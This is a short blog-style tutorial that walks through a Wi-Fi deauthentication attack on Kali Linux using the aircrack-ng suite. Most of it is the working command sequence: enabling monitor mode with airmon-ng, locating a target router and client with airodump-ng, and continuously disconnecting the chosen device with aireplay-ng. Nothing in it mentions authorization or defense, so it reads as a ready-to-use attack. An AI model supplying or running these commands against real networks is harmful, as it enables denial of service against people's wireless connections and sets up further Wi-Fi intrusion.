Wi-fi deauthentication attack using Kali-Linux

Forcing a device to disconnect from Wi-Fi using a deauthentication attack.

Deauthentication attack use a deauthentication frame.This frame sent from a router to a device so it forces the device to disconnect from the network.

Basic idea of how it works :



Now lets begin the attack .

First if you have installed Kali on virtual machine you need a wifi adapter. 

Install aircrack-ng :

sudo apt install aircrack-ng


List all wifi interfaces :

iwconfig











In this case my adapter is shown as wlan0


Put adapter in monitor mode :

airmon-ng start wlan0










Now my adapter is wlan0mon because its in monitor mode.


Find all wifi routers and devices :

airodump-ng wlan0mon











Get target wifi router's bssid (mac address)


Find devices only on target wifi network :

airodump-ng wlan0mon --bssid [routers BSSID here]--channel [routers channel here]


After that we find the bssid of the device we want to attack(kick)


Initiate Attack  :

aireplay-ng --deauth 0 -c [DEVICES MAC ADDRESS] -a [ROUTERS MAC ADDRESS] wlan0mon










This will send deauthentication frames to the device continuously and disconnect the device from the network.

Comments

Popular posts from this blog

Exploring the Marvels of Bing AI Image Generator

XSSploit: The Ultimate XSS Vulnerability Detection Tool

Cross Site Scripting (XSS)